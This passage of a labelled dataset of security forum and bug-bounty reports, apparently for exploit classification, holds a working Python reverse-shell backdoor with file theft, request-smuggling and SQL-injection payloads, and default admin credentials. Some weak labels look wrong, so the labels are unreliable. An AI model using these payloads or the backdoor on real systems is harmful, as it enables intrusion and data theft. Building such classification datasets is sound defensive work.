cb581035f90f6091ba1e9857a25f081bc4723761ec0f4bb18860de12ff0d2b64e2746962a35f58a09c3ad60aa20a601c86483770a40269a28b20c35cac236a6be5712874f91a06f5ce66ef57bd552544ee682a61a31408898720c21eac163d27d32b702ef65d5effd87c9956a54e4274ef762b3ae41f19f5de7f8757ac286c63e97b2b6df9191aebde43bd27ef0d6061f8276461b3575cea863ada0aa00f7561e0742774a24647abc136df12e1022e69e1716874a65f44ac8d2fc30fe3002a69e1717f64eb1f06fcc264984cb71f3821a225491f974c4ba09e3a9a2aed006264ed7a212ff64a46e8bb1d9b03e255742cbc337118dc6e4ba68b3ec34bc900667ee8742a72ec0f4fbf873e9b46e80b637ded692139f64d5ac8e40dd808e20b6665e5722a2ff6444da09e63d60ae518601c865e2b7abd464dffce35d15bbf0c3025e8297624e11b19f393 I tried reversing the calculation but without the key I couldn’t find myself in much progress. I also tried analyzing the cipher texts and while I was able to find similarities, I can’t seem to find anything else. I am not particularly looking for the complete solution, rather some clues as to what I might be missing. I would be happy if anyone could point the way", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6d19a5baa8c1d7aefab2", "text": "[Cross-site Scripting (XSS) - Generic] HTML Injection in email via Name field\n\nHello Gents,\nI would like to report an issue where attackers are able to inject HTML into the `Name` field at `app.qualified.dev`.\n\n### Steps to reproduce:\n1. Please register at https://app.qualified.dev/signup\n2. Inject the `Name`field with any HTML payload.\n3. Open the victim's test email, HTML will be executed.\n\n### Proof of concept:\n+ {F1744498}\n\n## Impact\n\nHTML Injection", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4bd4655d000a7ff7b6d7", "text": "[Phishing] Brave Shield for iOS is weak against IDN homograph attacks\n\n## Summary:\n\nIn most parts of Brave for iOS, including the address bar, protection against IDN attacks are implemented.\nHowever, Brave Shield has no countermeasures.\nFor example, when you visit https://www.xn--80ak6aa92e.com , Brave Shield panel in the address bar shows the domain of this site is \"apple.com\".\nThis may lead users to be deceived into believing that the site is legitimate.\n\n## Products affected: \n\n * Brave for iOS (Version 1.45.2)\n\n## Steps To Reproduce:\n\n * Visit https://www.xn--80ak6aa92e.com\n * Open Brave Shield panel from the address bar\n * \"apple.com\" is shown in the panel\n\n## Supporting Material/References:\n\n * See the screenshot I attached.\n\n## Impact\n\nThis may lead users to be deceived into believing that the site is legitimate.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "36f88c823bfd79ee7485", "text": "[Cross-site Scripting (XSS) - Generic] XSS: `v-safe-html` is not safe enough\n\n`v-safe-html` directive uses Dompurify [to remove](https://gitlab.com/gitlab-org/gitlab-ui/-/blob/9f1bcb1f7392d4d6d072f10197c2aab2c29c3287/src/directives/safe_html/constants.js#L3) `data-remote', 'data-url', 'data-type', 'data-method'` attributes from HTML tags. Rails-js relies on another attribute, [`data-disable-with`](https://github.com/rails/rails/blob/v6.1.4.7/actionview/app/assets/javascripts/rails-ujs.coffee#L10) to [show a HTML content](https://github.com/rails/rails/blob/v6.1.4.7/actionview/app/assets/javascripts/rails-ujs/features/disable.coffee#L41) when an user clicks on a disabled link.\n\nFor example, the following text will bypass the sanitization and popup an alert when an user clicks on the link (which is a transparent topmost layer since the sanitization allows also `style` and `class` attributes):\n\n```html\n\">'\n```\n\nAn exploitation can be done via [jobs' error messages](https://gitlab.com/gitlab-org/gitlab/-/blob/38af35c2a4aa666f914484d3f119b813651a2041/app/assets/javascripts/jobs/components/job_app.vue#L215) which contain [CI job names](https://gitlab.com/gitlab-org/gitlab/-/blob/7f86b5b78c107f7124b54e1f797099741765b3d2/app/serializers/build_details_entity.rb#L154) which are provided by users.\n\n\n\n### Steps to reproduce\n\n1. In an existing project or create a new one, add `.gitlab.ci` file with the following content:\n\n```yaml\n'1. XSS when no CSP\">':\n stage: build\n script: echo \"hi\"\n\n'2. Admin escalation when having CSP
':\n stage: build\n script: echo \"hi\"\n\ntrigger-xss:\n stage: test\n script: echo \"hi\"\n dependencies:\n - '1. XSS when no CSP\">'\n - '2. Admin escalation when having CSP'\n```\n\n2. Go to `CI/CD`/`Jobs` tab and wait for the CI jobs finished\n\n3. If you are testing on a local instance without CSP protection, click on detail of the job `1. XSS when no CSP\">`, then click on the trash button on the right literal bar to `Erase job logs and artifacts`.\n\n3. Go back to the job list, click on `trigger-xss` link to view the detail of this job. Then click on `Retry` button on the right literal bar to retry the job.\n\n4. An error message appears: `This job could not start because it could not retrieve the needed artifacts: 1. XSS when no CSP`. Click anywher to trigger the alert\n\nNote: on gitlab.com or an instance having CSP protection (with `strict-dynamic` value of `script-src`), the inline script, such as `onerror` or the [``](https://gitlab.com/gitlab-org/gitlab/-/issues/233473), will be prevented to trigger. In such a case, we may use `` tag to trigger arbitrary API requests on behalf of the user, for example, this allows escalate to admin permission when administrator *click anywhere* `2. Admin escalation when having CSP`\n\n### Impact\n\nXSS allow attackers to perform arbitrary actions on behalf of ", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7b98960221a82a6e975a", "text": "[Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')] CVE-2023-28320 - siglongjmp race condition\n\nlibcurl provides several different backends for resolving host names, selected at build time. If it is built to use the synchronous resolver, it allows name resolves to time-out slow operations using alarm() and siglongjmp().\n\nWhen doing this, libcurl used a global buffer that was not mutex protected and a multi-threaded application might therefore crash or otherwise misbehave.\n\n## Impact\n\nDenial of service due to a crash (likely) or possibly other impacts.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-28320"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "72e750a26781a7f7e964", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\ncurl supports \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.\n\nThe use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.\n\n## Impact\n\nDenial of service", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32206"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "af2528c03fc4b224cde3", "text": "[Improper Access Control - Generic] Default Admin Username and Password on ███\n\nIt is possible to access the application is using the default username and password \nSteps To Reproduce:\n1-Go to https://███/geoportal/ and login with credentials:\nuser and password: admin\nuser and password: gptadmin\nPoc video attached\n\n## Impact\n\nA Department of Defense website was misconfigured in a manner that may have allowed a malicious user to login with administrator for the default organization account credentials and delete posts , edit website\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nPOC video\n\n## Suggested Mitigation/Remediation Actions", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "310202aa4f87937d3955", "text": "[Privacy Violation] Brute force protections don't work\n\n## Summary:\nMost of the brute force protections don't actually throttle() the response and so they are not logging negative attempts\n\nSearch for functions with the `@BruteForceProtection` annotation and check that they call `throttle()` on the response at least conditionally.\n\n## Impact\n\nBrute force protection is not throttling any requests:\nhttps://github.com/nextcloud/server/blob/b70c6a128fe5d0053b7971881696eafce4cb7c26/lib/private/AppFramework/Middleware/Security/BruteForceMiddleware.php#L78-L82", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0bccd491bc7da53699da", "text": "[Buffer Over-read] Read beyond bounds in mod_isapi.c [zhbug_httpd_41]\n\nGreetings. I have found a read-beyond-bounds bug in httpd that arises from an apparent logic error.\n\nThe bug is in /modules/arch/win32/mod_isapi.c, on lines 979 and/or 983, which use the length of the path to the ISAPI DLL (|strlen(r->filename)|) to index into the string specified by the ISAPI DLL itself in its call to ServerSupportFunction/HSE_REQ_MAP_URL_TO_PATH, which contains unrelated data. This error presumably can be exploited under appropriate conditions.\n\nThis bug is still present in trunk.\n\nRelevant code:\n```\n966: case HSE_REQ_MAP_URL_TO_PATH:\n967: {\n968: /* Map a URL to a filename */\n969: char *file = (char *)buf_data;\n970: apr_uint32_t len;\n971: subreq = ap_sub_req_lookup_uri(\n972: apr_pstrndup(cid->r->pool, file, *buf_size), r, NULL);\n973:\n974: if (!subreq->filename) {\n975: ap_destroy_sub_req(subreq);\n976: return 0;\n977: }\n978:\n979: len = (apr_uint32_t)strlen(r->filename);\n980:\n981: if ((subreq->finfo.filetype == APR_DIR)\n982: && (!subreq->path_info)\n983: && (file[len - 1] != '/'))\n984: file = apr_pstrcat(cid->r->pool, subreq->filename, \"/\", NULL);\n985: else\n986: file = apr_pstrcat(cid->r->pool, subreq->filename,\n987: subreq->path_info, NULL);\n988:\n989: ap_destroy_sub_req(subreq);\n990:\n991: #ifdef WIN32\n992: /* We need to make this a real Windows path name */\n993: apr_filepath_merge(&file, \"\", file, APR_FILEPATH_NATIVE, r->pool);\n994: #endif\n995:\n996: *buf_size = apr_cpystrn(buf_data, file, *buf_size) - buf_data;\n997:\n998: return 1;\n999: }\n```\nAttached is a POC that demonstrates the bug. To use it:\n\n 1. Add the specified lines to httpd.conf.\n 2. Build dllmain.cpp and foo.def into foo.dll.\n 3. Create the folder /bug41 in the webserver root.\n 4. Copy foo.dll into /bug41 .\n 5. Run httpd and attach a debugger to it.\n 6. Set a BP on line 969, above.\n 7. Open a browser (or CURL) and attempt to load the URL /bug41/foo.dll .\n 8. When the BP fires, step through line 979.\n 9. Notice that |r->filename| is something like \"g:/serverroot/bug41/foo.dll\" (the filesystem path to the ISAPI DLL) and that |len| is its length.\n 10. Notice that |file| points to a 0 byte string (string length 0), which is what HttpExtensionProc() in foo.dll sent in its call to ServerSupportFunction/HSE_REQ_MAP_URL_TO_PATH (dllmain.cpp line 30).\n 11. Step once more and notice that line 983 reads one byte from |len-1| bytes beyond the end of |file|.\n```\n-------- httpd.conf lines ----------------------------------------------------\n\n AddHandler isapi-handler .dll\n Options ExecCGI\n Allow from all\n\n-------- httpd.conf lines ----------------------------------------------------\n```\n```\n-------- dllmain.cpp ----------------------------------------------------\n#include \n#include \n\nBOOL APIENTRY DllMain( HMODULE hModule,\n DWORD ul_reason_for_call,\n LPVOID lpReserved\n )\n{\n switch (ul_reason_for_call)\n {\n case DLL_PROCESS_ATTACH:\n case DLL_THREAD_ATTACH:\n case DLL_THREAD_DETACH:\n case DLL_PROCESS_DETACH:\n break;\n }\n return TRUE;\n}\n\nBOOL WINAPI GetExtensionVersion(HSE_VERSION_INFO * pVI) {\n return TRUE;\n}\n\nDWORD WINAPI HttpExtensionProc(EXTENSION_CONTROL_BLOCK* pECB) {\n\n char buf[] = \"\";\n DWORD bufSize = sizeof(buf);\n\n pECB->ServerSupportFunction(\n pECB->ConnID, HSE_REQ_MAP_URL_TO_PATH, buf, &bufSize, NULL);\n\n return HSE_STATUS_SUCCESS;\n}\n-------- dllmain.cpp ----------------------------------------------------\n\n-------- foo.def ----------------------------------------------------\nLIBRARY foo\nEXPORTS\n DllMain\n GetExtensionVersion\n HttpExtensionProc\n-------- foo.def ----------------------------------------------------\n```\n\n## Impact\n\nBeyond bounds data might be r", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ed2f762c7e5176477620", "text": "[HTTP Request Smuggling] Possibility of Request smuggling attack\n\nRequest smuggling was possible by throwing an IOException with the upper size limit of the trailer header.\nConfirmed with tomcat version 9.0.82.\n\n* example\n~~~~~~~~~~~~~~~~~~\nPOST /examples/test.jsp HTTP/1.1\nHost: www.example.co.jp\nContent-Type: application/x-www-form-urlencoded\nTransfer-Encoding: chunked\nConnection: KeepAlive\n\n5\nfoo=b\n2\nar\n0\ntesttrailer: aaaaa...(large size)\na: GET /examples/?this_is_attack HTTP/1.1\nHost: attack\n\n~~~~~~~~~~~~~~~~~~\n\n\n* Reproduce with the following steps:\n```\n$ git clone https://github.com/oss-aimoto/tomcat-trailer.git\n$ cd tomcat-trailer\n$ docker-compose build\n$ docker-compose up -d\n$ echo -n \"testtrailer: \" > 8190_EXCLUDE_COLON_SP_CR_LF.txt\n$ for i in `seq 8179`; do echo -n \"a\"; done >> 8190_EXCLUDE_COLON_SP_CR_LF.txt\n$ perl -e 'print \"\\r\\n\"' >> 8190_EXCLUDE_COLON_SP_CR_LF.txt\n$ head -11 base.txt > attack5.txt\n$ cat 8190_EXCLUDE_COLON_SP_CR_LF.txt >> attack5.txt\n$ perl -e 'print \"a: GET /examples/?this_is_attack HTTP/1.1\\r\\nHost: attack\\r\\n\\r\\n\"' >> attack5.txt\n$ cat attack5.txt | curl telnet://localhost:8082/ --output -\n```\n\nThe result of curl is two HTTP responses(\"/examples/test.jsp\" and \"/examples/?this_is_attack\").\nTwo requests are recorded in the Tomcat access log.\n\n```\n192.168.128.1 - - [23/Oct/2023:06:55:37 +0000] \"POST /examples/test.jsp HTTP/1.1\" 200 58\n192.168.128.1 - - [23/Oct/2023:06:55:37 +0000] \"GET /examples/?this_is_attack HTTP/1.1\" 200 1126 \n```\n\n## Impact\n\nA trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0e3508db576a96d60c1f", "text": "[Insecure Storage of Sensitive Information] Insecure Storage of Sensitive Information on lonestarcell.com server\n\nHello , i hope your doing well \n\ni found some sensitive information disclosure at those endpoint\nit is disclosure server status and some other stuff \n\nhttps://simregistration.lonestarcell.com//monitoring/DB02/DB02.html#System\nhttps://simregistration.lonestarcell.com//monitoring/DB01/index.html\nhttps://simregistration.lonestarcell.com//monitoring\n\n## Impact\n\nSensitive Information disclosure on lonestarcell server", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "552167f3766372ed652a", "text": "[Uncontrolled Resource Consumption] DOS validator nodes of blockchain to block external connections\n\nAttack was documented in the in the github repo: https://github.com/hyperledger/indy-node/security/advisories/GHSA-x996-7qh9-7ff7\n\n# Attack:\nThe attacker sends 500 read requests to each node and opens a new one when\nholding 500 parallel connections. Every user is able to send read requests\nsince it's a public readable registry so setting up an allowlist like it's\ndone with the nodes' port for the consensus does not work here. To increase\nthe efficiency:\n\nthe custom read request is increased with more bytes (random header or\njson values)\nthe bandwidth of the sender machine is limited\nRequirements on the attacker side:\nIndy-VDR: comment out the timeouts. Using another tool to send the requests\ncould be even more efficient\nVM: attack can be performed from one or multiple VMs limited connection: using\nTC to limit the bandwidth (value depends on the amount of connections)\nSample Implementation\nWe set up a VON-Network and added the firewall rules. The VM had 32 CPUs\nand 64 GB RAM\n\n# Result:\nthere is no damage to the blockchain, only an unreachable network as long\nas the attack is going on .\nOther clients are not able to send read or write requests to the nodes. In\nthe \"best case\" their requests will go through but with a response time of\nmultiple seconds, see:\nNot available [image: image.png]\n\nNot available [image: image.png]\n\n# Counteractions:\nblacklisting actors: It does not matter what is in the body since the\nfirewall rule acts in front of indy that is processing the information. To\navoid big requests the firewall could set a limit of the request size, but\nthis could also block valid requests.\nScaling via the observer-pattern: Right now the amount of nodes is\nlimited so blocking 25*500 connections is very easy. When adding nodes in\nfront of the validators to prevent accessing from the internet the\nvalidators are save, but then all the observers are under attack\nScalability: Giving the VMs more CPU and RAM to increase the parallel\nconnections amount can help in first run, but the DoS attack can be\nperformed as a DDos. An attacker does not have to DoS the network 24/7, but\ncan scale up the VMs on demand to attack a specific network. The setup is\ndone in about 2 minutes automatically. In our test we used 500 as the\nlimit. Maybe there is some kind of algorithm for the node administrators to\ncalculate the limit based on their CPU. But in this case the attacker can\nalso increase his ressources.\n\n## Impact\n\nAn attacker can max out the number of client connections allowed by the ledger, leaving the ledger unable to be used for its intended purpose.\n\nHowever, the ledger content will not be impacted and the ledger will resume servicing client requests after the conclusion of the attack.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "743514c5f767b6479533", "text": "[Unknown] Delete any user's added Email,Telephone,Fax,Address,Skype via csrf in (https://academy.acronis.com/)\n\nHi there,\n\nIt is possible to delete anyone's added email,telephone,fax,address,Skype via CSRF in `GET` method. The action is performed via `GET`method without any CSRF protection.\n\n# Steps to reproduce\n\n- login to your https://academy.acronis.com account\n- navigate to `https://academy.acronis.com/#/account/edit/account_id/`\n- add any email,telphone,fax,addres,skype \n- try deleting them and capture the request \n- you'll see the request is performed in `GET` method without any CSRF protection\n\n#POC\n\n```\n\n \n \">\n \n \n \n\n```\n\n#Fix \n Use X-CSRF token or perform the action in `POST` method with a CSRF token.\n\n## Impact\n\nDelete any user's added email,telephone,fax,address,Skype with CSRF attack.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1f4f9cd558eb601d6fbd", "text": "[Information Disclosure] jira discloser information\n\nThe ticket raising system used by informatica suffers from an informational vulnerability where in an attacker can view certain details about open bugs or project information of informatica. Details include names and potentially and ticket names which an unauthorized personnel can view without login that can be very useful to an attacker.\n\nendpoints:\n\nhttps://infajira.informatica.com/secure/QueryComponent!Default.jspa\n\n## Impact\n\nattacker miss use this information", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ea8a247cbfad96414acd", "text": "[Heap Overflow] heap-buffer-overflow in gc_writebarrier_incremental\n\nhow to reproduce:\nbuild ruby-3.2.2 with asan\ncat heap-buffer-overflow | ruby-3.2.2/miniruby -e 'Marshal.load(ARGF.read)'\n\n## Impact\n\nmay over access memory", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "42dc74a5931163ccecd9", "text": "[Insecure Direct Object Reference (IDOR)] Can access the job name, creator name and can report any draft/under review/rejected job\n\nThe application has a functionality using which a user can report a job if he found the job is misleading/spam or fraud. Using this feature, an attacker can do report any unlisted (draft/under review/rejected) job. After reporting the job the victim will receive an email from 'LinkedIn Trust & Safety Team' saying 'We reviewed your report. Here's what we did.' This also discloses the name of the user and his profile link who posted the job. Once you click on the 'view your report' button of the email, it will redirect you to the reports page at = 'https://www.linkedin.com/safety/reports/:reportId' This will disclose the name of the rejected/draft/under review job.\n\n### Steps to reproduce:\n1. Log in to an account and go to any posted job - `https://www.linkedin.com/jobs/view/3084381086/`\n3. Now open any (rejected/draft or under review job using the job id) - https://www.linkedin.com/jobs/view/3086447496/. The application will give ` Something went wrong ` error message.\n2. Report the posted job and intercept the vulnerable request.\n{F1744522}\n4. Forward the job using the draft, rejected jobId - 3086447496. The report will get submitted without any error. And after some time (1hr) you will receive an email in the social tab of the email from `Linkedin Trust and Safety`. This email includes the name of the job creator and his profile link and when u click on the `View your Report` button. It will disclose the name of the job including the location.\n{F1744530}{F1744531}{F1744532}\n\n###Vulnerable request:\n```\nPOST /lite/flag-content?contentUrn=urn:li:jobPosting:3086455454&reason=OFFENSIVE&contentSource=JOBS_PREMIUM_OFFLINE&authorProfileId=0&trk=report-content HTTP/2\nHost: www.linkedin.com\nCookie: XXX\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCsrf-Token: ajax:3198904967979491318\nX-Isajaxform: 1\nOrigin: https://www.linkedin.com\nReferer: https://www.linkedin.com/jobs/view/3084381086/?refId=%EF%BF%BD%2F%EF%BF%BD%21d%EF%BF%BD%27%EF%BF%BDe%1A_s%EF%BF%BD%16%EF%BF%BD%EF%BF%BD&trk=d_flagship3_company\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nContent-Length: 0\nTe: trailers\n```\n\n## Impact\n\nAn attacker can report any unlisted job and can access the name of the creator, name of the job name of the company, etc details.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "55a5ad6742078f302b56", "text": "[Uncontrolled Resource Consumption] potential denial of service attack via the locale parameter\n\nIn Django 3.2 before 3.2.16, 4.0 before 4.0.8, and 4.1 before 4.1.2, internationalized URLs were subject to a denial of service attack via the locale parameter, which is treated as a regular expression.\n\n## Impact\n\nBy crafting a Python regex, a vulnerable site could suffer a DOS attack. The attack was most likely to happen on sites that processes locale IDs from URL parameters.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c805f24dbe6313d55fe9", "text": "thank you to everyone who contributed in providing tips you all were very helpful. my piece of advice would try and get an error in your burp requests that gives you an idea of what commands are being ran in what syntax while messing around with the different feilds of injection. once youve got the syntax then all you need to do is bypass filters and find the proper payload.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e5c56f4557e8086b0ba2", "text": "[Open Redirect] Attacker can smuggle a malicious domain in a URI object.\n\nSimple example:\n```\nuser_provided_redirect_uri = \"http:////malware.com/real/path\"\nevil_uri = URI.parse(user_provided_redirect_uri)\nevil_uri.host # => nil\nevil_uri.to_s # => \"http://malware.com/real/path\"\n```\n\nIn many common URI-validation scenarios, the target system will likely parse a user provided URI, and then check the host against some internal validation criteria, eg, that it's a host owned by that system. Seeing a blank hostname will often cause the system to assume that the link only contains a path, not a domain, so any validation or checking of that domain won't happen.\n\nHowever, if the URI object is turned back into a string, the resulting URI contains the malicious domain, as you can see above. The actual behavior is to remove two of the leading slashes, so starting with 4 leading slashes will give you 2 leading slashes in the output, which is a well-formed (and in this case malicious) URL.\n\nIn addition, most browsers (all that I checked on) will allow multiple slashes before the domain name -- type \"http:////google.com\" in to your browser, and you will go to google. So, using the original string will also result in a redirection to the malicious host.\n\nBottom line, this bug is almost certainly the cause of a large number of open redirect vulnerabilities in Ruby based web apps. The most obvious use would be to craft malicious URIs for phishing purposes, but it could be used to potentially circumvent any host-checking logic in a URI validator.\n\nThe cause of the bug can be seen here: https://github.com/ruby/ruby/blob/trunk/lib/uri/rfc3986_parser.rb#L6 (if you can spot it in there). The real smoking gun is comment on the line above it that says the regex is modified from the RFC to allow empty host names. A little consideration will show why this causes the above behavior, and why it ends up stripping the initial two leading slashes.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4601179737899ef2f07e", "text": "here is a python backdoor CLIENT: from socket import * import subprocess import os def connect(): server = socket(AF_INET, SOCK_STREAM) # server ip host = \"192.168.1.8\" port = 111 buffer_size = 1024 print(\"[+] Connecting to {}:{}\".format(host, port)) server.connect((host, port)) print(\"[+] Connected!\") while 1: command = server.recv(1024) command_decoded = command.decode(\"utf-8\") if \"terminate\" in command_decoded: print(\"[!] Connection closed!\") server.close() break elif \"steal\" in command_decoded: file_path = command_decoded.split(\">\") print(\"[+] Start!\") with open(file_path[1], \"rb\") as f: while True: file_bytes = f.read(buffer_size) if not file_bytes: break server.send(file_bytes) end = \"end-transfer-file\".encode(\"ISO-8859-1\") server.send(end) print(\"[+] End!\") else: CMD = subprocess.Popen(command_decoded, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) server.send(CMD.stdout.read()) def main(): connect() main() SERVER: from socket import * PWD = input(\"Where do you want to save your files stealed? \\nExample: /home/nonameon/Desktop/file\\nPath: \") def connect(): # TCP connection sock = socket(AF_INET, SOCK_STREAM) host = \"192.168.1.8\" port = 11 buffer_size = 1024 sock.bind((host, port)) sock.listen(1) while 1: print(\"[+] Listening {}:{}\".format(host, port), end=\"\") client, addr = sock.accept() print(\"\\n[+] Connection from: \", addr) print(\"[?] Use 'steal>' for get file or 'terminate' for close connection\") while 1: command = input(\"Shell> \") if \"terminate\" in command: client.send(\"terminate\".encode()) client.close() print(\"[+] Closed!\") print(\"[+] Listening {}:{}\".format(host, port), end=\"\") break else: #manda client.send(command.encode()) #riceve resp = client.recv(buffer_size) flag = True if \"steal\" in command: file_backdoor = PWD print(\"[+] Start!\") with open(file_backdoor, \"wb\") as f: while True: f.write(resp) resp = client.recv(buffer_size) if \"end-transfer-file\" in resp.decode(\"ISO-8859-1\"): break print(\"[+] End!\") else: print(resp.decode(\"ISO-8859-1\")) def main(): connect() main()", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-03-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0810dc13877bfc454694", "text": "[Use of Hard-coded Credentials] Credential leak on GitHub: https://github.com/█/█/ (Peoplesoft CRM)\n\n**Description:** \nhey , \ni found a credential leak on github \nhttps://github.com/████████/███████/blob/22dc688289fac99f█████/testsql.sh\n\n## Steps To Reproduce:\n\n(Add details for how we can reproduce the issue)\n\n 1. open https://github.com/██████████/█████████/blob/22dc688289fac99f████/testsql.sh\n 1. you can see username and password \n \n\n## Supporting Material/References:\n████\n\n## Impact\n\nwith this information disclosure we can access to Peoplesoft CRM database", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ff9ea91c90ec8733447c", "text": "Now thats a post worth reading , welcome to 0x00sec and do join us on discord .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-01-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4ef55c5374931a067543", "text": "[Insecure Direct Object Reference (IDOR)] read and message other user's messages\n\ngo to your account's chat page, stop the request and change the reddit session parameter, now leave the request and you will be able to access the test account's chat screen\n\nsend the request to the repeater change the reddit session parameter and send it then you will see the return result is 200\n\nshow reply in browser and copy and paste the address into your browser you will access the chat page of your test account\n\n## Impact\n\nother users' chat screen can be accessed\nand message can be sent", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "928ac4d28c99c141e27f", "text": "[Resource Injection] Object injection in `stripe-billing-typographic` GitHub project via /auth/login\n\n## Summary:\nIt is possible to use an object injection failure to achieve a sql injection, where attacker uses the means to bypass authentication, requiring only a valid password within the database.\n\nThe vulnerable code is: https://github.com/stripe/stripe-billing-typographic\n\nFor a failure to occur, it is necessary that the environment is configuring with the mysql database. \n\nThe same scenario is seen in the demonstration environment: https://typographic.io/\n\n## Steps To Reproduce:\n\n 1. Register a simple user in the application, with a password at your desire. Ex:\n```\nuser: test@test.com\npassword:123\n```\n 2. Send a request to /auth/login like this:\n```\nPOST /auth/login\n\n{\"email\":{\"email\":1},\"password\":\"1234\"}\n```\n 3. You will then see that the login was performed without the need to provide a valid user!\n\n{F1287585}\n\n\n## Supporting Material/References:\nWell, the failure occurs due to the possibility of an object reaching the query, which will be handled by a dependency called sqlstring, performing some scapes, where it will cause a confusion to the query.\n\nSqlstring will handle {,} replacing with `. \nSo your login query will be:\n```\nSELECT * FROM `accounts` WHERE `email`=`email`=1\n```\nThe sql string library is a dependency on the mysql library, which is used by knex.\n\n## Mitigation\n\nIs a simple step, use JSON.stringfy e resolve your problem, because JSON.stringfy will transform the malicious object into a string, preventing treatment during a query.\n\n## Impact\n\nThis vulnerability to the applied scenario makes it easier for the attacker to acquire accounts, as the attacker only needs to discover a valid password to gain access to the victim's account.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-06", "split": 